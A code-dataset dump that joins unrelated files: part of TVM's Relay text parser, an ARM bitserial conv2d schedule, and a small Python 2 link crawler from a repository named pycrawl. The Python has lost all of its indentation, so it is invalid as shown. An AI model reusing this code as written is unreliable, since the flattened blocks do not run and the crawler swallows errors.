header, data = str(ctx.METADATA()).split("\n", 1)
assert header == "METADATA:"
self.meta = tvm.load_json(data)
if ctx.defn():
self.visit_list(ctx.defn())
return self.module
if ctx.expr():
return self.visit(ctx.expr())
return self.module
# Exprs
def visitOpIdent(self, ctx) -> op.Op:
op_name = ".".join([name.getText() for name in ctx.CNAME()])
if op_name in FUNC_OPS:
return FuncOp(FUNC_OPS[op_name])
return ExprOp(op.get(op_name))
# pass through
def visitParen(self, ctx: RelayParser.ParenContext) -> expr.Expr:
return self.visit(ctx.expr())
# pass through
def visitBody(self, ctx: RelayParser.BodyContext) -> expr.Expr:
return self.visit(ctx.expr())
def visitScalarFloat(self, ctx: RelayParser.ScalarFloatContext) -> expr.Constant:
return expr.const(self.visit(ctx.FLOAT()))
def visitScalarInt(self, ctx: RelayParser.ScalarIntContext) -> expr.Constant:
return expr.const(self.visit(ctx.NAT()))
def visitScalarBool(self, ctx: RelayParser.ScalarBoolContext) -> expr.Constant:
return expr.const(self.visit(ctx.BOOL_LIT()))
def visitNeg(self, ctx: RelayParser.NegContext) -> Union[expr.Constant, expr.Call]:
val = self.visit(ctx.expr())
if isinstance(val, expr.Constant) and val.data.asnumpy().ndim == 0:
# fold Neg in for scalars
return expr.const(-val.data.asnumpy().item())
return op.negative(val)
def visitTuple(self, ctx: RelayParser.TupleContext) -> expr.Tuple:
tup = self.visit_list(ctx.expr())
return expr.Tuple(tup)
def visitLet(self, ctx: RelayParser.LetContext) -> expr.Let:
"""Desugar various sequence constructs to Relay Let nodes."""
if ctx.var() is None:
# anonymous identity
ident = "_"
typ = None
var = self.mk_var(ident, typ)
else:
var = self.visitVar(ctx.var())
self.enter_var_scope()
value = self.visit(ctx.expr(0))
self.exit_var_scope()
body = self.visit(ctx.expr(1))
return expr.Let(var, value, body)
def visitBinOp(self, ctx: RelayParser.BinOpContext) -> expr.Call:
"""Desugar binary operators."""
arg0, arg1 = self.visit_list(ctx.expr())
relay_op = BINARY_OPS.get(ctx.op.type)
if relay_op is None:
raise ParseError("unimplemented binary op.")
return relay_op(arg0, arg1)
@spanify
def visitVar(self, ctx: RelayParser.VarContext) -> expr.Var:
"""Visit a single variable."""
ident = ctx.localVar()
if ident is None:
raise ParseError("only local ids may be used in vars.")
typeExpr = self.getTypeExpr(ctx.typeExpr())
return self.mk_var(ident.getText()[1:], typeExpr)
def visitVarList(self, ctx: RelayParser.VarListContext) -> List[expr.Var]:
return self.visit_list(ctx.var())
# TODO: support a larger class of values than just Relay exprs
def visitAttr(self, ctx: RelayParser.AttrContext) -> Tuple[str, expr.Expr]:
return (ctx.CNAME().getText(), self.visit(ctx.expr()))
def visitArgNoAttr(self, ctx: RelayParser.ArgNoAttrContext):
return (self.visit_list(ctx.varList().var()), None)
def visitAttrSeq(self, ctx: RelayParser.AttrSeqContext) -> Dict[str, expr.Expr]:
return dict(self.visit_list(ctx.attr()))
def visitArgWithAttr(self, ctx: RelayParser.AttrSeqContext) \
-> Tuple[List[expr.Var], Dict[str, expr.Expr]]:
return (self.visit_list(ctx.var()), self.visitAttrSeq(ctx.attrSeq()))
def visitArgList(self, ctx: RelayParser.ArgListContext) \
-> Tuple[Optional[List[expr.Var]], Optional[Dict[str, expr.Expr]]]:
var_list = self.visit(ctx.varList()) if ctx.varList() else None
attr_list = self.visit(ctx.attrList()) if ctx.attrList() else None
return (var_list, attr_list)
def visitMeta(self, ctx: RelayParser.MetaContext):
type_key = str(ctx.CNAME())
index = int(self.visit(ctx.NAT()))
return self.meta[type_key][index]
def mk_func(
self,
ctx: Union[RelayParser.FuncContext, RelayParser.DefnContext]) \
-> expr.Function:
"""Construct a function from either a Func or Defn."""
# Enter var scope early to put params in scope.
self.enter_var_scope()
# Capture type params in params.
self.enter_type_param_scope()
type_params = ctx.typeParamList()
if type_params is not None:
type_params = type_params.generalIdent()
assert type_params
for ty_param in type_params:
name = ty_param.getText()
self.mk_typ(name, ty.Kind.Type)
var_list, attr_list = self.visit(ctx.argList())
if var_list is None:
var_list = []
ret_type = self.getTypeExpr(ctx.typeExpr())
body = self.visit(ctx.body())
# NB(@jroesch): you must stay in the type parameter scope until
# after you exit the body, you can reference the type parameters
# of your parent scopes.
type_params = list(self.exit_type_param_scope())
if type_params:
_, type_params = zip(*type_params)
self.exit_var_scope()
attrs = tvm.make.node("DictAttrs", **attr_list) if attr_list is not None else None
return expr.Function(var_list, body, ret_type, type_params, attrs)
@spanify
def visitFunc(self, ctx: RelayParser.FuncContext) -> expr.Function:
return self.mk_func(ctx)
# TODO: how to set spans for definitions?
# @spanify
def visitFuncDefn(self, ctx: RelayParser.DefnContext) -> None:
ident_name = ctx.globalVar().getText()[1:]
ident = self.mk_global_var(ident_name)
self.module[ident] = self.mk_func(ctx)
def handle_adt_header(
self,
ctx: Union[RelayParser.ExternAdtDefnContext, RelayParser.AdtDefnContext]):
"""Handles parsing of the name and type params of an ADT definition."""
adt_name = ctx.generalIdent().getText()
adt_var = self.mk_global_typ_var(adt_name, ty.Kind.AdtHandle)
# parse type params
type_params = ctx.typeParamList()
if type_params is None:
type_params = []
else:
type_params = [self.mk_typ(type_ident.getText(), ty.Kind.Type)
for type_ident in type_params.generalIdent()]
return adt_var, type_params
def visitExternAdtDefn(self, ctx: RelayParser.ExternAdtDefnContext):
# TODO(weberlo): update this handler once extern is implemented
self.enter_type_param_scope()
adt_var, type_params = self.handle_adt_header(ctx)
# update module being built
self.module[adt_var] = adt.TypeData(adt_var, type_params, [])
self.exit_type_param_scope()
def visitAdtDefn(self, ctx: RelayParser.AdtDefnContext):
self.enter_type_param_scope()
adt_var, type_params = self.handle_adt_header(ctx)
# parse constructors
adt_cons_defns = ctx.adtConsDefnList()
if adt_cons_defns is None:
adt_cons_defns = []
else:
adt_cons_defns = adt_cons_defns.adtConsDefn()
parsed_constructors = []
for cons_defn in adt_cons_defns:
inputs = [self.visit(inp) for inp in cons_defn.typeExpr()]
cons_defn_name = cons_defn.constructorName().getText()
cons_defn = adt.Constructor(cons_defn_name, inputs, adt_var)
self.mk_global_typ_cons(cons_defn_name, cons_defn)
parsed_constructors.append(cons_defn)
# update module being built
self.module[adt_var] = adt.TypeData(adt_var, type_params, parsed_constructors)
self.exit_type_param_scope()
def visitMatch(self, ctx: RelayParser.MatchContext):
match_type = ctx.matchType().getText()
if match_type == "match":
complete_match = True
elif match_type == "match?":
complete_match = False
else:
raise RuntimeError(f"unknown match type {match_type}")
# TODO: Will need some kind of type checking to know which ADT is being
# matched on.
match_data = self.visit(ctx.expr())
match_clauses = ctx.matchClauseList()
if match_clauses is None:
match_clauses = []
else:
match_clauses = match_clauses.matchClause()
parsed_clauses = []
for clause in match_clauses:
constructor_name = clause.constructorName().getText()
constructor = self.global_type_vars[constructor_name]
self.enter_var_scope()
patternList = clause.patternList()
if patternList is None:
patterns = []
else:
patterns = [self.visit(pattern) for pattern in patternList.pattern()]
clause_body = self.visit(clause.expr())
self.exit_var_scope()
# TODO: Do we need to pass `None` if it's a 0-arity cons, or is an empty list fine?
parsed_clauses.append(adt.Clause(
adt.PatternConstructor(
constructor,
patterns
),
clause_body
))
return adt.Match(match_data, parsed_clauses, complete=complete_match)
def visitPattern(self, ctx: RelayParser.PatternContext):
text = ctx.getText()
if text == "_":
return adt.PatternWildcard()
elif text.startswith("%"):
text = ctx.localVar().getText()
typ = ctx.typeExpr()
if typ is not None:
typ = self.visit(typ)
var = self.mk_var(text[1:], typ=typ)
return adt.PatternVar(var)
else:
raise ParseError(f"invalid pattern syntax \"{text}\"")
def visitCallNoAttr(self, ctx: RelayParser.CallNoAttrContext):
return (self.visit_list(ctx.exprList().expr()), None)
def visitCallWithAttr(self, ctx: RelayParser.CallWithAttrContext):
return (self.visit_list(ctx.expr()), self.visit(ctx.attrSeq()))
def call(self, func, args, attrs, type_args):
if isinstance(func, OpWrapper):
return func(args, attrs, type_args)
elif isinstance(func, adt.Constructor):
return func(*args)
return expr.Call(func, args, attrs, type_args)
@spanify
def visitCall(self, ctx: RelayParser.CallContext):
# type: (RelayParser.CallContext) -> expr.Call
func = self.visit(ctx.expr())
args, attrs = self.visit(ctx.callList())
res = self.call(func, args, attrs, [])
return res
@spanify
def visitIfElse(self, ctx: RelayParser.IfElseContext):
# type: (RelayParser.IfElseContext) -> expr.If
"""Construct a Relay If node. Creates a new scope for each branch."""
cond = self.visit(ctx.expr())
self.enter_var_scope()
true_branch = self.visit(ctx.body(0))
self.exit_var_scope()
self.enter_var_scope()
false_branch = self.visit(ctx.body(1))
self.exit_var_scope()
return expr.If(cond, true_branch, false_branch)
@spanify
def visitGraph(self, ctx: RelayParser.GraphContext):
# type: (RelayParser.GraphContext) -> expr.Expr
"""Visit a graph variable assignment."""
graph_nid = int(ctx.graphVar().getText()[1:])
self.enter_var_scope()
value = self.visit(ctx.expr(0))
self.exit_var_scope()
if graph_nid != len(self.graph_expr):
raise ParseError(
"expected new graph variable to be `%{}`,".format(len(self.graph_expr)) + \
"but got `%{}`".format(graph_nid))
self.graph_expr.append(value)
kont = self.visit(ctx.expr(1))
return kont
# Types
# pylint: disable=unused-argument
def visitIncompleteType(self, ctx: RelayParser.IncompleteTypeContext):
        # type: (RelayParser.IncompleteTypeContext) -> None
return None
def visitTypeCallType(self, ctx: RelayParser.TypeCallTypeContext):
func = self.visit(ctx.generalIdent())
args = [self.visit(arg) for arg in ctx.typeParamList().generalIdent()]
return ty.TypeCall(func, args)
def visitParensShape(self, ctx: RelayParser.ParensShapeContext):
# type: (RelayParser.ParensShapeContext) -> int
return self.visit(ctx.shape())
def visitShapeList(self, ctx: RelayParser.ShapeListContext):
# type: (RelayParser.ShapeListContext) -> List[int]
return self.visit_list(ctx.shape())
def visitTensor(self, ctx: RelayParser.TensorContext):
return tuple(self.visit_list(ctx.expr()))
def visitTensorType(self, ctx: RelayParser.TensorTypeContext):
# type: (RelayParser.TensorTypeContext) -> ty.TensorType
"""Create a simple tensor type. No generics."""
shape = self.visit(ctx.shapeList())
dtype = self.visit(ctx.typeExpr())
if not isinstance(dtype, ty.TensorType):
raise ParseError("expected dtype to be a Relay base type.")
dtype = dtype.dtype
return ty.TensorType(shape, dtype)
def visitTupleType(self, ctx: RelayParser.TupleTypeContext):
# type: (RelayParser.TupleTypeContext) -> ty.TupleType
return ty.TupleType(self.visit_list(ctx.typeExpr()))
def visitFuncType(self, ctx: RelayParser.FuncTypeContext):
# type: (RelayParser.FuncTypeContext) -> ty.FuncType
types = self.visit_list(ctx.typeExpr())
arg_types = types[:-1]
ret_type = types[-1]
return ty.FuncType(arg_types, ret_type, [], None)
def make_parser(data):
# type: (str) -> RelayParser
"""Construct a RelayParser a given data stream."""
input_stream = InputStream(data)
lexer = RelayLexer(input_stream)
lexer.addErrorListener(StrictErrorListener(data))
token_stream = CommonTokenStream(lexer)
p = RelayParser(token_stream)
p.addErrorListener(StrictErrorListener(data))
return p
__source_name_counter__ = 0
class StrictErrorListener(ErrorListener):
"""This ErrorListener fail eagerly on all error, and report the program."""
def __init__(self, text):
self.text = text
def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):
raise Exception("Syntax Error in:\n" + self.text)
def reportAmbiguity(self, recognizer, dfa, startIndex, stopIndex, exact, ambigAlts, configs):
raise Exception("Ambiguity Error in:\n" + self.text)
def reportAttemptingFullContext(self,
recognizer,
dfa,
startIndex,
stopIndex,
conflictingAlts,
configs):
raise Exception("Attempting Full Context in:\n" + self.text)
def reportContextSensitivity(self, recognizer, dfa, startIndex, stopIndex, prediction, configs):
raise Exception("Context Sensitivity in:\n" + self.text)
def fromtext(data, source_name=None):
# type: (str, str) -> Union[expr.Expr, module.Module]
"""Parse a Relay program."""
if data == "":
raise ParseError("cannot parse the empty string.")
global __source_name_counter__
if source_name is None:
source_name = "source_file{0}".format(__source_name_counter__)
if isinstance(source_name, str):
source_name = SourceName(source_name)
tree = make_parser(data).prog()
return ParseTreeToRelayIR(source_name).visit(tree)
```
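A small usage sketch for `fromtext`. The program below is illustrative; the leading `v0.0.4` line satisfies the `SEMVER` header that Relay's text-format grammar of this vintage expects at the top of every program:
```python
program = """
v0.0.4
fn (%x: Tensor[(10), float32]) {
    add(%x, %x)
}
"""
func = fromtext(program, source_name="example.relay")
```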
#### File: topi/arm_cpu/bitserial_conv2d.py
```python
from __future__ import absolute_import as _abs
import tvm
from tvm import autotvm
from tvm import relay
from .. import tag
from ..nn.pad import pad
from ..nn.bitserial_conv2d import bitserial_conv2d_nhwc, bitserial_conv2d_legalize
from ..nn.bitserial_util import bitpack, binary_op_multiplier
from ..nn.util import get_pad_tuple
from ..util import get_const_int, get_const_tuple
from .. import generic
def _kernel_vec_spatial_pack_nhwc(kernel, kernel_bits, VC, use_bitpack=True):
if use_bitpack:
kernel_q = bitpack(kernel, kernel_bits, pack_axis=2, bit_axis=2, pack_type='uint8')
else:
kernel_q = kernel
KH, KW, KB, CI, CO = kernel_q.shape
kvshape = (CO//VC, KH, KW, KB, VC, CI)
return tvm.compute(kvshape, lambda co, dh, dw, b, vc, ci: \
kernel_q[dh][dw][b][ci][co*VC+vc], name='kernel_vec')
@autotvm.register_topi_compute(bitserial_conv2d_nhwc, 'arm_cpu', 'direct')
def spatial_pack_nhwc(cfg, data, kernel, stride, padding, activation_bits, weight_bits,
pack_dtype, out_dtype, unipolar):
""" Compute convolution with pack on spatial axes. """
assert data.shape[0].value == 1, "spatial pack convolution only support batch size=1"
assert pack_dtype == 'uint8', "only support packing into uint8 bits"
assert out_dtype == 'int16', "only support output type of int16"
N, H, W, CI = get_const_tuple(data.shape)
if len(kernel.shape) == 4:
KH, KW, _, CO = get_const_tuple(kernel.shape)
CI_packed = CI // 8
else:
KH, KW, KB, CI_packed, CO = get_const_tuple(kernel.shape)
if isinstance(padding, int) or (isinstance(padding, (tuple, list)) and len(padding) == 2):
TPAD, LPAD, DPAD, RPAD = get_pad_tuple(padding, kernel)
else:
TPAD, LPAD, DPAD, RPAD = padding
if isinstance(stride, (tuple, list)):
HSTR, WSTR = stride
else:
HSTR, WSTR = stride, stride
HCAT, WCAT = KH-1, KW-1
PAD_H = H + (TPAD + DPAD)
PAD_W = W + (LPAD + RPAD)
OH = (PAD_H - KH) // HSTR + 1
OW = (PAD_W - KW) // WSTR + 1
oshape = (1, OH, OW, CO)
# Pad input channels of weights and data when it is not a multiple of 8
if CI_packed % 8 != 0:
CI_PAD = CI_packed % 8
CI_packed += CI_PAD
else:
CI_PAD = 0
# ==================== define configuration space ====================
n, oh, ow, co = cfg.axis(N), cfg.axis(OH), cfg.axis(OW), cfg.axis(CO)
ci, kh, kw = cfg.reduce_axis(CI_packed), cfg.reduce_axis(KH), cfg.reduce_axis(KW)
ib, kb = cfg.reduce_axis(activation_bits), cfg.reduce_axis(weight_bits)
co, vc = cfg.define_split('tile_co', co, num_outputs=2,
filter=lambda x: x.size[-1] == 8)
oh, vh = cfg.define_split('tile_oh', oh, num_outputs=2,
filter=lambda x: x.size[-1] >= 2)
ow, vw = cfg.define_split('tile_ow', ow, num_outputs=2,
filter=lambda x: x.size[-1] >= 2)
ci_o, ci_i = cfg.define_split("tile_ci", ci, num_outputs=2,
filter=lambda x: x.size[-1] == 8 or x.size[-1] == 16)
re_axes = cfg.define_reorder("reorder_0",
[n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i],
policy='candidate', candidate=[
[n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i],
[n, oh, ow, co, vh, vw, kw, kh, ci_o, kb, ib, vc, ci_i],])
# binary ops
cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW * binary_op_multiplier(pack_dtype))
# ====================
VC = cfg["tile_co"].size[-1]
VH = cfg["tile_oh"].size[-1]
VW = cfg["tile_ow"].size[-1]
data_q = bitpack(data, activation_bits, pack_axis=3, bit_axis=3, pack_type='uint8')
kernel_vec = _kernel_vec_spatial_pack_nhwc(kernel, weight_bits, VC, len(kernel.shape) == 4)
if kernel_vec.shape[-1] % 8 != 0 and CI_PAD != 0:
kernel_vec = pad(kernel_vec, [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, CI_PAD])
N, H, W, IB, CI = data_q.shape
OCO, KH, KW, KB, VC, CI = kernel_vec.shape
dvshape = (N, PAD_H//(VH*HSTR), PAD_W//(VW*WSTR), VH*HSTR+HCAT, VW*WSTR+WCAT, IB, CI)
ovshape = (1, OH // VH, OW // VW, CO // VC, VH, VW, VC)
if (TPAD != 0 and RPAD != 0):
data_pad = pad(data_q, (0, TPAD, LPAD, 0, 0), (0, DPAD, RPAD, 0, CI_PAD), name="data_pad")
elif CI_PAD != 0:
data_pad = pad(data_q, (0, 0, 0, 0, 0), (0, 0, 0, 0, CI_PAD), name="data_pad")
else:
data_pad = data_q
data_vec = tvm.compute(dvshape, lambda n, h, w, vh, vw, b, ci: \
data_pad[n][h*VH*HSTR+vh][w*VW*WSTR+vw][b][ci], name='data_vec')
ci = tvm.reduce_axis((0, CI), name='ci')
dh = tvm.reduce_axis((0, KH), name='dh')
dw = tvm.reduce_axis((0, KW), name='dw')
ib = tvm.reduce_axis((0, IB), name='ib')
kb = tvm.reduce_axis((0, KB), name='kb')
def _bipolar_conv(n, h, w, co, vh, vw, vc):
return tvm.sum((tvm.popcount(
kernel_vec[co, dh, dw, kb, vc, ci].astype('uint16') &
data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci].astype('uint16'))
<< (kb + ib).astype('uint16')), axis=[dh, dw, kb, ib, ci])
def _unipolar_conv(n, h, w, co, vh, vw, vc):
return tvm.sum(
((tvm.popcount(kernel_vec[co, dh, dw, kb, vc, ci].astype('int16') &
data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci].astype('int16')) -
tvm.popcount(~kernel_vec[co, dh, dw, kb, vc, ci].astype('int16') &
data_vec[n, h, w, vh*HSTR+dh, vw*WSTR+dw, ib, ci]).astype('int16'))
<< (kb + ib).astype('int16')), axis=[dh, dw, kb, ib, ci])
if unipolar:
conv_vec = tvm.compute(ovshape, _unipolar_conv, name='conv_vec', tag='unipolar')
else:
conv_vec = tvm.compute(ovshape, _bipolar_conv, name='conv_vec', tag='bipolar')
conv = tvm.compute(oshape, lambda n, h, w, co:
conv_vec[n][h//VH][w//VW][co//VC][h%VH][w%VW][co%VC].astype(out_dtype),
name='conv', tag='spatial_bitserial_conv_nhwc')
return conv
def _intrin_popcount(m, k_i, w_b, x_b, unipolar):
pack_dtype = 'uint8'
w = tvm.placeholder((w_b, m, k_i), dtype=pack_dtype, name='w')
x = tvm.placeholder((x_b, k_i,), dtype=pack_dtype, name='x')
k = tvm.reduce_axis((0, k_i), name='k')
bw = tvm.reduce_axis((0, w_b), name='bw')
bx = tvm.reduce_axis((0, x_b), name='bx')
if unipolar:
dtype = 'int16'
z = tvm.compute((m,), lambda i:
tvm.sum((tvm.popcount(w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype)) -
tvm.popcount(~w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype)))
<< (bw+bx).astype(dtype), axis=[bw, bx, k]), name='z')
else:
dtype = 'uint16'
z = tvm.compute((m,), lambda i:
tvm.sum(tvm.popcount(w[bw, i, k].astype(dtype) & x[bx, k].astype(dtype))
<< (bw+bx).astype(dtype), axis=[bw, bx, k]), name='z')
Wb = tvm.decl_buffer(w.shape, w.dtype,
name="W",
offset_factor=k_i,
strides=[tvm.var('ldw'), tvm.var('ldw'), 1]) # stride can be inferred
Xb = tvm.decl_buffer(x.shape, x.dtype,
name="X",
offset_factor=k_i,
strides=[tvm.var('ldw'), 1])
Zb = tvm.decl_buffer(z.shape, z.dtype,
name="Z",
offset_factor=1,
strides=[1])
def _intrin_func(ins, outs):
ww, xx = ins
zz = outs[0]
args_1 = tvm.const(1, 'uint32')
args_2 = tvm.const(2, 'uint32')
if unipolar:
vpadd = "llvm.arm.neon.vpadd.v8i8"
vpadalu = "llvm.arm.neon.vpadals.v16i8.v8i16"
full_dtype = 'int8x16'
half_dtype = 'int8x8'
return_dtype = 'int16x8'
else:
vpadd = "llvm.arm.neon.vpadd.v8u8"
vpadalu = "llvm.arm.neon.vpadalu.v16u8.v8u16"
full_dtype = 'uint8x16'
half_dtype = 'uint8x8'
return_dtype = 'uint16x8'
def _instr(index):
irb = tvm.ir_builder.create()
if index == 1: # reduce reset
irb.emit(zz.vstore(0, tvm.const(0, return_dtype)))
return irb.get()
# body and reduce update
cnts8 = [None] * 8
cnts4 = [None] * 4
cnts2 = [None] * 2
for bw in range(w_b):
for bx in range(x_b):
if k_i == 16:
for i in range(m):
w_ = ww.vload([bw, i, 0], 'uint8x16').astype(full_dtype)
x_ = xx.vload([bx, 0], 'uint8x16').astype(full_dtype)
if unipolar:
cnts = tvm.popcount(w_ & x_) - tvm.popcount(~w_ & x_)
else:
cnts = tvm.popcount(w_ & x_)
upper_half = tvm.call_pure_intrin(half_dtype, 'vectorhigh', cnts)
lower_half = tvm.call_pure_intrin(half_dtype, 'vectorlow', cnts)
cnts8[i] = upper_half + lower_half
for i in range(m//2):
cnts4[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts8[i*2], cnts8[i*2+1])
for i in range(m//4):
cnts2[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts4[i*2], cnts4[i*2+1])
cnts = tvm.call_pure_intrin(full_dtype, 'vectorcombine', cnts2[0], cnts2[1])
shifted_cnts = cnts << tvm.const(bw+bx, pack_dtype)
out = tvm.call_llvm_intrin(return_dtype, vpadalu,
args_2, zz.vload(0, return_dtype), shifted_cnts)
else: # ki == 8
for i in range(m):
w_ = ww.vload([bw, i, 0], 'uint8x8').astype(half_dtype)
x_ = xx.vload([bx, 0], 'uint8x8').astype(half_dtype)
if unipolar:
cnts8[i] = tvm.popcount(w_ & x_) - tvm.popcount(~w_ & x_)
else:
cnts8[i] = tvm.popcount(w_ & x_)
for i in range(m//2):
cnts4[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts8[i*2], cnts8[i*2+1])
for i in range(m//4):
cnts2[i] = tvm.call_llvm_intrin(half_dtype, vpadd,
args_1, cnts4[i*2], cnts4[i*2+1])
cnts = tvm.call_pure_intrin(full_dtype, 'vectorcombine', cnts2[0], cnts2[1])
shifted_cnts = cnts << tvm.const(bw+bx, pack_dtype)
out = tvm.call_llvm_intrin(return_dtype, vpadalu,
args_2, zz.vload(0, return_dtype), shifted_cnts)
irb.emit(zz.vstore(0, out))
return irb.get()
# body, reset, update
return _instr(0), _instr(1), _instr(2)
with tvm.build_config(offset_factor=1, partition_const_loop=True):
return tvm.decl_tensor_intrin(z.op, _intrin_func, binds={w: Wb, x:Xb, z:Zb})
# ARM specific schedule that using custom microkernel
def _schedule_spatial_conv2d_nhwc(cfg, s, data_pad, data_vec, kernel_vec,
conv_out, output, last, unipolar):
_, _, _, _, _, IB, CI = data_vec.shape
_, KH, KW, KB, _, _ = kernel_vec.shape
KB = get_const_int(KB)
IB = get_const_int(IB)
VC = cfg["tile_co"].size[-1]
VH = cfg["tile_oh"].size[-1]
VW = cfg["tile_ow"].size[-1]
##### Schedule data padding and packing
if data_pad is not None:
s[data_pad].compute_inline()
_, h, _, _, _, _, _ = s[data_vec].op.axis
cfg.define_split("tile_ah", cfg.axis(h), num_outputs=2, max_factor=32)
oh, ih = cfg["tile_ah"].apply(s, data_vec, h)
s[data_vec].parallel(oh)
#### Schedule kernel packing
co, _, _, _, _, _ = s[kernel_vec].op.axis
cfg.define_split("tile_bco", cfg.axis(co), num_outputs=2, max_factor=32)
oco, ico = cfg["tile_bco"].apply(s, kernel_vec, co)
s[kernel_vec].parallel(oco)
##### Schedule Convolution
n, oh, ow, co, vh, vw, vc = s[conv_out].op.axis
kh, kw, kb, ib, ci = s[conv_out].op.reduce_axis
ci_o, ci_i = cfg['tile_ci'].apply(s, conv_out, ci)
re_axes = cfg["reorder_0"].apply(s, conv_out,
[n, oh, ow, co, vh, vw, kh, kw, ci_o, kb, ib, vc, ci_i])
# Use microkernel
kfactor = cfg['tile_ci'].size[1]
if kfactor % 8 == 0:
pc = _intrin_popcount(VC, kfactor, KB, IB, unipolar)
s[conv_out].tensorize(kb, pc)
n, h, w, co = s[last].op.axis
co, vc = cfg['tile_co'].apply(s, last, co)
oh, vh = cfg['tile_oh'].apply(s, last, h)
ow, vw = cfg['tile_ow'].apply(s, last, w)
s[last].reorder(n, oh, ow, co, vh, vw, vc)
s[last].vectorize(vc)
if last != output:
s[last].compute_inline()
s[conv_out].compute_at(s[last], co)
s[last].parallel(oh)
return s
@autotvm.register_topi_schedule(generic.nn.schedule_bitserial_conv2d_nhwc, 'arm_cpu', 'direct')
def schedule_bitserial_conv2d_nhwc(cfg, outs):
"""Arm cpu schedule for bitserial conv2d"""
s = tvm.create_schedule([x.op for x in outs])
scheduled_ops = []
def traverse(op):
"""Traverse operators from computation graph"""
# inline all one-to-one-mapping operators except the last stage (output)
if tag.is_broadcast(op.tag):
if op not in s.outputs:
s[op].compute_inline()
for tensor in op.input_tensors:
if isinstance(tensor.op, tvm.tensor.ComputeOp) and tensor.op not in scheduled_ops:
traverse(tensor.op)
if 'spatial_bitserial_conv_nhwc' in op.tag:
output = op.output(0)
conv_out = op.input_tensors[0]
kernel_vec = conv_out.op.input_tensors[0]
kernel_q = kernel_vec.op.input_tensors[0]
data_vec = conv_out.op.input_tensors[1]
data_q = data_vec.op.input_tensors[0]
data = data_q.op.input_tensors[0]
data_pad = None
if isinstance(data_q.op, tvm.tensor.ComputeOp) and "pad" in data_q.op.tag:
data_pad = data_q
data_q = data
data = data.op.input_tensors[0]
unipolar = "unipolar" in conv_out.op.tag
_schedule_spatial_conv2d_nhwc(cfg, s, data_pad, data_vec, kernel_vec,
conv_out, output, outs[0], unipolar)
scheduled_ops.append(op)
traverse(outs[0].op)
return s
@bitserial_conv2d_legalize.register("arm_cpu")
def _bitserial_conv2d_legalize(attrs, inputs, arg_types):
"""Legalizes Bitserial Conv2D op.
Parameters
----------
attrs : tvm.attrs.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
# Fix different kernel layouts where possible.
if attrs['data_layout'] == 'NHWC':
data, kernel = inputs
if len(kernel.data.shape) == 4:
# HWIO layout is expected for NHWC input.
if attrs['kernel_layout'] == 'HWOI':
# Handle HWOI layout. This is common in TF depthwise conv2d graph.
kernel = relay.transpose(kernel, axes=(0, 1, 3, 2))
elif attrs['kernel_layout'] == 'OIHW':
kernel = relay.transpose(kernel, axes=(2, 3, 1, 0))
            ## Set new attrs for the transposed conv.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs['kernel_layout'] = 'HWIO'
conv = relay.nn.bitserial_conv2d(data, kernel, **new_attrs)
return conv
return None
``` |
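The legalize hook above rewrites HWOI and OIHW kernels into HWIO via `relay.transpose`; a standalone numpy sketch of the same axis permutations (shapes are illustrative):
```python
# Standalone illustration of the axis permutations used in the legalize hook
# above (numpy stands in for relay.transpose; shapes are illustrative).
import numpy as np

hwoi = np.zeros((3, 3, 16, 8))          # H, W, O, I
hwio = hwoi.transpose(0, 1, 3, 2)       # axes=(0, 1, 3, 2) -> H, W, I, O
print(hwio.shape)                       # (3, 3, 8, 16)

oihw = np.zeros((16, 8, 3, 3))          # O, I, H, W
hwio2 = oihw.transpose(2, 3, 1, 0)      # axes=(2, 3, 1, 0) -> H, W, I, O
print(hwio2.shape)                      # (3, 3, 8, 16)
```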
{
"source": "0x00red/pycrawl",
"score": 3
} |
#### File: 0x00red/pycrawl/main.py
```python
import urllib2
import sys
import os
##functions
def parseQmark(addr): ## strips the query string from a URL
i = 0
out = ""
try:
while(addr[i] != "?"):
out = out + addr[i]
i = i + 1
except:
return addr
return out
def openLink(address, local, current): ##returns list of addresses
tryflag = 0
out = []
out2 = []
try:
url = urllib2.urlopen(address)
except:
return ""
url = url.read()
url = url.split("\"")
for line in url:
if tryflag == 1:
out.append(line)
tryflag = 0
else:
if line[-7:] == "a href=":
tryflag = 1
continue
for addr in out:
addr = parseQmark(addr)
if addr[0:4] == "http":
out2.append(addr)
continue
elif addr[0] == "/":
out2.append(local + addr)
else:
if current[-1] == "/":
out2.append(current + addr)
else:
out2.append(current + "/" + addr)
return out2
def getRelative(addr): ##gets the server's address
out = ""
i = 0
if addr[0:7] == "http://":
i = 7
if addr[0:8] == "https://":
i = 8
try:
while(addr[i] != "/"):
out = out + addr[i]
i = i + 1
except:
return addr
return out
##main
try:
f = open("config.txt","r")
config = f.read()
config = config.split("\n")
f.close()
ITERATIONS = int(config[0])
except:
print("Config error")
sys.exit(0)
current = raw_input("Web address: ")
if current[0:4] != "http":
current = "http://" + current
queue = [current, ]
oldqueue = queue
completed = []
fyon = raw_input("Would you like to export to a file? y/n: ")
fyon = fyon.lower()
if fyon == "y" or fyon == "yes":
fyon = 1
file = raw_input("Filename: ")
try:
f = open(file, "w")
f.close()
except:
print("Unknown error.")
i = -1
cIT = 0
while(1):
try:
while(1):
while(cIT == ITERATIONS):
cont = raw_input("Continue? ")
cont = cont.lower()
if cont == "yes":
cIT = -1
break
elif cont == "no":
os._exit(0)
else:
continue
cIT = cIT + 1
i = i + 1
addr = queue[i]
current = addr
relative = getRelative(addr)
if addr in completed:
continue
if openLink(addr, relative, current) == "":
continue
queue = queue + openLink(addr, relative, current)
oldqueue = queue
print(addr)
if fyon == 1:
try:
f = open(file, "r")
fcon = f.read()
f.close()
f = open(file, "w")
f.write(fcon + addr + "\n")
f.close()
except:
f = open(file, "w")
f.write(addr + "\n")
f.close()
completed.append(addr)
except:
queue = oldqueue[::-1]
``` |
